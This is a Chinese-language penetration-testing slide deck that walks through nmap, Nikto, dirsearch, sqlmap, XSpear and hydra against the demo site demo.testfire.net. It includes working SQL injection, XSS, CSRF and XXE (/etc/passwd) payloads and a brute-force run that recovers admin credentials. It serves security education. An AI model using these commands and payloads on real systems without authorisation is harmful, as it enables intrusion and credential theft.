Contenu connexe Similaire à VulnScan_PenTest.pdf Similaire à VulnScan_PenTest.pdf (20) VulnScan_PenTest.pdf2. 弱點掃描 – Vulnaribility Scan(Vuln Scan)
簡介:
檢查管理的主機、伺服器或網路設備是否存在可能的漏洞,以
及確認機器上各個 Port 的狀態與相關的服務
特性:
自動化、識別已知漏洞、成本低、速度快、測試頻率高
3. 滲透測試 – Penetration Test(Pen Test)
簡介:
在應用層面或網絡層面進行攻擊,針對具體的功能,尋長正常
業務流程中未知的安全缺陷
特性:
人工+工具、發現且利用漏洞、成本高、速度慢、測試頻率低
5. 檢測流程
Step 1: 檢測範圍 – 網段、服務、外網、內網……
Step 2: 檢測時程
Step 3: 檢測工具與方式 –
(工具) Nmap、OpenVAS、OWASP ZAP、……
(方式) 埠掃描、DDOS、社交工程、爆破密碼、……
Step 4: 實施檢測
Step 5: 改善作業
Step 6: 進行複檢
檢測流程有同有異,測試前請詳閱雙方合約書
7. nmap
SYN Scan : nmap -sS [IP] -p [PORT]
Port Scan : nmap -sT [IP] -p [PORT]
UDP Scan : nmap –sU [IP] –p [PORT]
-T [NUM] : threads
-p : ports
more: man nmap
8. nmap -sS 65.61.137.117 -p-
Starting Nmap 7.80SVN ( https://nmap.org ) at 2020-0X-0X 22:19
CST
Nmap scan report for 65.61.137.117
Host is up (0.18s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1474.81 seconds
12. Nikto -host 65.61.137.117
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 65.61.137.117
+ Target Hostname: demo.testfire.net
+ Target Port: 80
+ Start Time: 2020-04-14 22:34:52 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP
response
+ Scan terminated: 19 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-04-14 22:36:50 (GMT8) (118 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
15. 實作 - OpenVAS
Ubuntu 16.04 :
https://resdoss.blogspot.com/2018/04/openvas9ubuntu16kio
ptrix-level-1.html
Ubuntu 18.04 : https://kifarunix.com/how-to-install-and-
setup-openvas-9-vulnerability-scanner-on-ubuntu-18-04/
Kali linux : http://yearlin101.blogspot.com/2017/08/kali-
linux-openvas.html
16. 興趣使然的檢測員
小 z 得知 65.61.137.117 有開 80 和 443 port,因此試著
連上網站,果然發現一個 domain 為 demo.testfire.net,於是
小 z 打算開始滲透測試這個網站,要從哪裡下手呢?
22. 收集資料 – 插件
Wappalyzer: 透過發送 request 給指定 URL,從 response
的標頭獲得資訊
Chrome:
https://chrome.google.com/webstore/detail/wappalyzer/gppo
ngmhjkpfnbhagpmjfkannfbllamg?hl=zh-TW
Firefox:
https://addons.mozilla.org/zh-
TW/firefox/addon/wappalyzer/
24. 收集資料 – chrome 插件
EditThisCookie: 每個網域有各自的 cookie,並且儲存在使
用者端,而這個插件讓使用者方便查閱與修改 cookie
Chrome:
https://chrome.google.com/webstore/detail/editthiscookie/fn
gmhnnpilhplaeedifhccceomclgfbg?hl=zh-TW
Firefox(Cookie Editor):
https://addons.mozilla.org/zh-TW/firefox/addon/edit-
cookie/
26. Cookie attributes
HostOnly: cookie 是否只用在指定網域
Session: 被當作 session 處理的 cookie
Secure: cookie 透過 http 還是 https 傳送
HTTP Only: cookie 能否 javascript 存取
SameSite: 根據當前網域是否與目標相同,決定是否發
cookie
28. python3 dirsearch.py -u https://demo.testfire.net/ -e * -r -x 403
……
[23:36:21] 302 - 0B - /images -> /images/
[23:36:22] 200 - 9KB - /index.jsp
[23:36:29] 200 - 8KB - /login.jsp
[23:36:47] 302 - 0B - /pr -> /pr/
……
32. SQL injection(sqli)
SELECT * FROM users WHERE name = ‘$USER’ and passwd=‘$PASSWD’ ;
SELECT * FROM users WHERE name = ‘’ or 1=1--’ and passwd=‘a’ ;
$USER = ‘ or 1=1-- $PASSWD = a
33. 測試工具 - sqlmap
sqlmap
sudo apt install sqlmap
https://github.com/sqlmapproject/sqlmap
-u [URL]
--data=[POST DATA]
--level [NUM]
--risk [NUM]
more: sqlmap -h
34. sqlmap -u https://65.61.137.117/doLogin --data="uid=a&passw=b" --level=3 --risk=3 --drop-set-cookie
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: uid=-6055' OR 6504=6504-- HAZj&passw=bb&btnSubmit=Login
37. XSpear -u "http://demo.testfire.net/search.jsp?query=a" -a
| NO | TYPE | ISSUE| METHOD | PARAM | PAYLOAD
……
| 7 | HIGH | XSS | GET | query | <audio src onloadstart=alert(45)>
| 8 | HIGH | XSS | GET | query | <marquee onstart=alert(45)>
| 9 | HIGH | XSS | GET | query | <video/poster/onerror=alert(45)>
……
38. Clickjacking
若有個網站 A 沒有把 X-Frame-Options 設為 DENY 或是
SAMEORIGIN,則另一個網站 B 就可以將 A 網站嵌入
同源策略 (Same-origin policy):在Web瀏覽器中,允許某個
網頁腳本訪問另一個網頁的數據,但前提是這兩個網頁必須有
相同的URI、主機名和埠號
40. Cross Site Request Forgery(CSRF)
若有個網站的重要 cookie 的 SameSite 沒有設定好,可能導
致駭客可以利用使用者的身分做壞事
SameSite:
No Restriction – 最寬鬆,cookie 會被夾帶在從其他網域
發出的 get 和 post request
Lax – 其次,只有 get request 時會夾帶 cookie
Strict – 最嚴格,不管是什麼 request,都不會夾帶這
個 cookie
41. Cross Site Request Forgery(CSRF)
ex.am/ple.php
Zeze info
user : zeze
password : ******
ha.ck/er.php
<a href=“http://ex.am/ple.php?m=edit&user=zeze&pass=123456”>Click!</a>
Click!
42. XML External Entity Injection(XXE)
<?xml version=“1.0” encoding=“utf-8”?>
<root>
<name>zeze</name>
</root>
ex.am/ple.php
Search
name: zeze
43. XML External Entity Injection(XXE)
<?xml version=“1.0” encoding=“utf-8”?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM
"file:///etc/passwd">]>
<root>
<name>&xxe</name>
</root>
ex.am/ple.php
Search
name: &xxe
44. OWASP Top 10
1. Injection
2. Broken Authentication
3. Sensitive Data
Exposure
4. XML External
Entities(XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting(XSS)
8. Insecure Deserialization
9. Using Components with
Known Vulneraabilities
10. Insufficient Logging &
Monitoring
https://owasp.org/www-project-top-ten/
45. 滲透測試工具 - OWASP ZAP
簡介:OWASP Zed Attack Proxy(ZAP),Open Web
Application Security Project (OWASP) 開發的測試網頁
程式漏洞工具,並設有簡單易用的介面,讓網頁開發員測
試自己開發的網頁是否安全。
https://owasp.org/www-project-zap/
47. 滲透測試 – 插件
HackBar
簡介:支援各種攻擊手法的 payload, encode/decode, hash
function, 也可以構造各種 request
Chrome:
https://chrome.google.com/webstore/detail/hackbar/ginpbkfigc
oaokgflihfhhmglmbchinc
Firefox:
https://addons.mozilla.org/zh-TW/firefox/addon/hackbar-
quantum/
51. 爆破帳號密碼 - hydra
hydra install
Kali: built-in
Other linux: https://github.com/vanhauser-thc/thc-hydra
Windows: https://github.com/maaaaz/thc-hydra-windows
53. hydra -L ./user.txt -P ./pass.txt demo.testfire.net http-post-form
"/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:F=Failed"
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-17 12:48:08
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try pertask
[DATA] attacking http-post-
form://demo.testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:F=Failed
[80][http-post-form] host: demo.testfire.net login: admin password: admin